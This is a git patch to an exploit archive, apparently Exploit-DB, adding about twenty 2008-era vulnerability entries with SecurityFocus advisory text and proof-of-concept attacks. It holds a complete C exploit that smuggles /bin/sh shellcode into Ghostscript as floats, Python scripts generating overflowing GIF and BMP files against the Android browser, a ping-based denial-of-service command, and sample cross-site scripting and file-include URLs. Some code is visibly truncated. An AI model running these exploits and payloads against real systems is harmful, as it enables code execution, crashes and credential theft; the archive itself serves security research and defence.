From 890c9015815037ac85bcd3df9e503a77664d760d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 2 Feb 2014 04:25:24 +0000 Subject: [PATCH] Updated 02_02_2014 --- files.csv | 21 +++++ platforms/asp/webapps/31314.txt | 9 ++ platforms/cgi/webapps/31313.txt | 10 +++ platforms/hardware/dos/31306.txt | 11 +++ platforms/hardware/dos/31307.py | 32 +++++++ platforms/hardware/dos/31308.html | 58 +++++++++++++ platforms/hardware/remote/31311.txt | 32 +++++++ platforms/linux/remote/31309.c | 129 ++++++++++++++++++++++++++++ platforms/php/webapps/31312.txt | 9 ++ platforms/php/webapps/31315.txt | 9 ++ platforms/php/webapps/31316.txt | 9 ++ platforms/php/webapps/31317.txt | 9 ++ platforms/php/webapps/31318.txt | 11 +++ platforms/php/webapps/31319.txt | 9 ++ platforms/php/webapps/31320.txt | 9 ++ platforms/php/webapps/31321.txt | 7 ++ platforms/php/webapps/31322.txt | 9 ++ platforms/php/webapps/31324.txt | 9 ++ platforms/php/webapps/31325.txt | 9 ++ platforms/php/webapps/31326.txt | 9 ++ platforms/php/webapps/31328.txt | 12 +++ platforms/windows/dos/31323.c | 118 +++++++++++++++++++++++++ 22 files changed, 540 insertions(+) create mode 100755 platforms/asp/webapps/31314.txt create mode 100755 platforms/cgi/webapps/31313.txt create mode 100755 platforms/hardware/dos/31306.txt create mode 100755 platforms/hardware/dos/31307.py create mode 100755 platforms/hardware/dos/31308.html create mode 100755 platforms/hardware/remote/31311.txt create mode 100755 platforms/linux/remote/31309.c create mode 100755 platforms/php/webapps/31312.txt create mode 100755 platforms/php/webapps/31315.txt create mode 100755 platforms/php/webapps/31316.txt create mode 100755 platforms/php/webapps/31317.txt create mode 100755 platforms/php/webapps/31318.txt create mode 100755 platforms/php/webapps/31319.txt create mode 100755 platforms/php/webapps/31320.txt create mode 100755 platforms/php/webapps/31321.txt create mode 100755 platforms/php/webapps/31322.txt create mode 100755 platforms/php/webapps/31324.txt create mode 100755 platforms/php/webapps/31325.txt create mode 100755 platforms/php/webapps/31326.txt create mode 100755 platforms/php/webapps/31328.txt create mode 100755 platforms/windows/dos/31323.c diff --git a/files.csv b/files.csv index 49f6f0b24..fcf14d17e 100755 --- a/files.csv +++ b/files.csv @@ -28114,3 +28114,24 @@ id,file,description,date,author,platform,type,port 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0 31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 +31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0 +31307,platforms/hardware/dos/31307.py,"Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 +31308,platforms/hardware/dos/31308.html,"Android Web Browser BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 +31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0 +31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0 +31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0 +31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0 +31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 +31315,platforms/php/webapps/31315.txt,"XRMS 1.99.2 CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0 +31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 +31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability",2008-02-29,RawSecurity.org,php,webapps,0 +31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 index.php Local File Include Vulnerability",2008-02-29,JosS,php,webapps,0 +31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x index.php Cross-Site Scripting Vulnerability",2008-02-29,ZoRLu,php,webapps,0 +31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 tourney/index.php Remote File Include Vulnerability",2008-02-29,"HACKERS PAL",php,webapps,0 +31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 +31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module 'id' Parameter SQL Injection Vulnerability",2008-03-01,TurkishWarriorr,php,webapps,0 +31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password Remote Denial of Service Vulnerability",2008-03-01,"Maks M",windows,dos,0 +31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0 +31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0 diff --git a/platforms/asp/webapps/31314.txt b/platforms/asp/webapps/31314.txt new file mode 100755 index 000000000..cba398a94 --- /dev/null +++ b/platforms/asp/webapps/31314.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28040/info + +Flicks Software AuthentiX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +AuthentiX 6.3b1 Trial Version is vulnerable; other versions may also be affected. + +https://www.example.com/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://www.example2.com/%22%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/31313.txt b/platforms/cgi/webapps/31313.txt new file mode 100755 index 000000000..901ea9292 --- /dev/null +++ b/platforms/cgi/webapps/31313.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28037/info + +Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability. + +Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks. + +Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. + +https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth +https://www.example.com/dana-na/auth/remediate.cgi?step=preauth \ No newline at end of file diff --git a/platforms/hardware/dos/31306.txt b/platforms/hardware/dos/31306.txt new file mode 100755 index 000000000..286097187 --- /dev/null +++ b/platforms/hardware/dos/31306.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28004/info + +Nortel UNIStim IP Phone products are prone to a remote denial-of-service vulnerability because the software fails to properly handle unexpected network datagrams. + +Successfully exploiting this issue allows remote attackers to crash affected phones, denying service to legitimate users. + +Phones with firmware 0604DAS are vulnerable to this issue. Other versions are also reportedly affected, but we don't know which specific versions. + +The following command will demonstrate this issue: + +ping -s 65500 \ No newline at end of file diff --git a/platforms/hardware/dos/31307.py b/platforms/hardware/dos/31307.py new file mode 100755 index 000000000..0bd832ca6 --- /dev/null +++ b/platforms/hardware/dos/31307.py @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/28005/info + +Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. + +Successfully exploiting this vulnerability can allow remote attackers to execute arbitrary machine code in the context of the application. Failed attempts will likely result in denial-of-service conditions. + +This issue affects Android SDK m3-rc37a and earlier. + +##Android Heap Overflow +##Ortega Alfredo _ Core Security Exploit Writers Team +##tested against Android SDK m3-rc37a + +import Image +import struct + +#Creates a _good_ gif image +imagename='overflow.gif' +str = '\x00\x00\x00\x00'*30000 +im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) +im.save(imagename,'GIF') + +#Shrink the Logical screen dimension +SWidth=1 +SHeight=1 + +img = open(imagename,'rb').read() +img = img[:6]+struct.pack(' +# Alfredo Ortega - Core Security +import struct + +offset = 0xffef0000 +width = 0x0bffff +height=8 + +bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" +bmp+=struct.pack(" + + + + + + + \ No newline at end of file diff --git a/platforms/hardware/remote/31311.txt b/platforms/hardware/remote/31311.txt new file mode 100755 index 000000000..27745c34f --- /dev/null +++ b/platforms/hardware/remote/31311.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/28034/info + +Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Juniper Networks Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. + +https://www.example.com/dana-na/auth/rdremediate.cgi?delivery_mode=&action=tryagain&signinId=url_default + +COMPLETE HTTP REQUEST: + +GET +/dana-na/auth/rdremediate.cgi?delivery_mode=&action=tryagain&signinId=url_default +HTTP/1.1 +User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4 +OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3 +Host: target-domain.foo +Accept: */* +[CRLF] +[CRLF] + + +PARTIAL HTTP RESPONSE: + + + +[SNIP] + + Unknown deliver mode + + diff --git a/platforms/linux/remote/31309.c b/platforms/linux/remote/31309.c new file mode 100755 index 000000000..2f2f4f180 --- /dev/null +++ b/platforms/linux/remote/31309.c @@ -0,0 +1,129 @@ +source: http://www.securityfocus.com/bid/28017/info + +Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. + +/* A proof of concept exploit for ghostscript 8.61 and earlier. + * + * Vulnerability discovered by Chris Evans + * Author: wad@google.com (Will Drewry) + * + * Affects: All versions of ghostscript that support .seticcspace. + * Tested on: Ubuntu gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 (x86) + * Ghostscript 8.61 (2007-11-21) (x86) + * + * Discussion: + * + * The vulnerability is in the float vector handling in the seticcspace + * function. zicc.c:seticcspace() allows the user to set the number of + * expected float values (ncomps) in a vector (range_buff). However, + * this vector is statically allocated with the maximum space of 8 + * floats. Despite this, the call (dict_floats_array_check_param) to + * populate the array of floats is passed a maximum size of ncomps*2. A + * large payload will result in overflowing this array. Since all the + * values are read in as single precision floating point values, the + * payload must be encoded as floats. + * + * This exploit encodes a basic metasploit-generated exec(/bin/sh) chunk + * of shellcode as a list of floats and prepends the address to a "jmp + * *%esp" in the /usr/bin/gs. + * + * This was tested on gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 package in + * Ubuntu (on a 32-bit-only kernel) and versions up to 8.61 + * (2007-11-21) on other distributions. + */ + +#include +#include +#include +#include + +unsigned char shellcode[] = +"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00" +"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69" +"\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"; +unsigned char sledpad[] = "\x90\x90\x90"; // maximum sledpad needed +unsigned char spacepad[] = "\x41\x41\x41\x41"; // indicator for fun dumps + +float bytes_to_float(unsigned char *bytes) { + float f = 0.0f; + memcpy((void *)&f, bytes, sizeof(float)); + return f; +} + +unsigned char *build_attack(size_t *attack_size, long a, int padding) { + size_t float_size = sizeof(float); + size_t shellcode_size = sizeof(shellcode) - 1; + size_t sledpad_size = float_size - (shellcode_size % float_size); + size_t pad_size = padding * (sizeof(spacepad) - 1); + unsigned char *attack = NULL, *padded_shellcode = shellcode; + int i,j; + + // allocate attack space + *attack_size = shellcode_size + sledpad_size + sizeof(a) + pad_size; + if (*attack_size) attack = malloc(*attack_size); + if (attack == NULL) exit(1); + + fprintf(stderr, "sizeof(float) = %d\n", float_size); + fprintf(stderr, "sledpad_size = %d\n", sledpad_size); + fprintf(stderr, "pad_size = %d\n", pad_size); + fprintf(stderr, "attack_size = %d\n", *attack_size); + fprintf(stderr, "address = %p\n", a); + + // write out request space padding + for (i = 0; i < pad_size; i += sizeof(spacepad)-1) + memcpy(&attack[i], spacepad, sizeof(spacepad)-1); + + // write out the address to a "jmp *%esp" + memcpy(&attack[i], (void *)&a, sizeof(long)); + i += sizeof(long); + + // pad to ensure that shellcode is divisible by sizeof(float) + if (sledpad_size != float_size){ + // build a padded a shellcode + padded_shellcode = malloc(shellcode_size+sledpad_size); + if (padded_shellcode == NULL) exit(1); + memcpy(padded_shellcode, sledpad, sledpad_size); + memcpy(padded_shellcode+sledpad_size, shellcode, shellcode_size); + shellcode_size += sledpad_size; + } + + // Copy in the padded shellcode + memcpy(&attack[i], padded_shellcode, shellcode_size); + + if (shellcode != padded_shellcode) free(padded_shellcode); + // That's it. + return attack; +} + +int main(int argc, char **argv) { + size_t i = 0; + size_t attack_size = 0; + unsigned char *attack = NULL; + // location of jmp *esp in the binary + long address = 0x0; + + + if (argc != 3){ + fprintf(stderr, "Usage: %s \n", argv[0]); + fprintf(stderr, " e.g. %s 15 $((0x8744eff))\n", argv[0]); + fprintf(stderr, "An address can be acquired with:\n"); + fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \\t]\\+\\*%%esp'\n"); + return 1; + } + + attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1])); + + // output the bad PS + printf( + "%!PS-Adobe-2.0\n\n" + "<< /DataSource currentfile /N 100 /Range [ "); + // convert the attack to floats + for(i = 0; i <= attack_size - sizeof(float); i += sizeof(float)) + printf("%.9g ", bytes_to_float(attack+i)); + printf(" ] >> .seticcspace\n"); + + free(attack); + return 0; +} diff --git a/platforms/php/webapps/31312.txt b/platforms/php/webapps/31312.txt new file mode 100755 index 000000000..d7f859355 --- /dev/null +++ b/platforms/php/webapps/31312.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28035/info + +Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. + +This issue affects Barryvan Compo Manager 0.3; other versions may also be vulnerable. + +http://www.example.com/main.php?pageURL=[Evil_Code] \ No newline at end of file diff --git a/platforms/php/webapps/31315.txt b/platforms/php/webapps/31315.txt new file mode 100755 index 000000000..85b2cd3d7 --- /dev/null +++ b/platforms/php/webapps/31315.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28041/info + +XRMS CRM is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +XRMS CRM 1.99.2 is affected; other versions may also be vulnerable. + +http://www.example.com//xrms/admin/users/self.php?msg=Preferences%20successfully%20saved&msg= \ No newline at end of file diff --git a/platforms/php/webapps/31316.txt b/platforms/php/webapps/31316.txt new file mode 100755 index 000000000..0ca0b1198 --- /dev/null +++ b/platforms/php/webapps/31316.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28043/info + +Centreon is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Centreon 1.4.2.2 and 1.4.2.3 are vulnerable; other versions may also be affected. + +http://www.example.com//include/common/javascript/color_picker.php?&name=XSS&title=%3Cscript%3Ea=/Test%20XSS/;alert(a.source)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31317.txt b/platforms/php/webapps/31317.txt new file mode 100755 index 000000000..65d78ee90 --- /dev/null +++ b/platforms/php/webapps/31317.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28051/info + +netOffice Dwins is prone to a vulnerability that allows attackers to bypass authentication as well as a vulnerability that allows attackers to upload arbitrary files. These issues occur because the application fails to adequately sanitize user-supplied input. + +Attackers can leverage these issues to gain unauthorized access to the application and to execute arbitrary code in the context of the application. + +These issues affect Dwins 1.3 p2; other versions may also be affected. + +
Upload Form
Comments :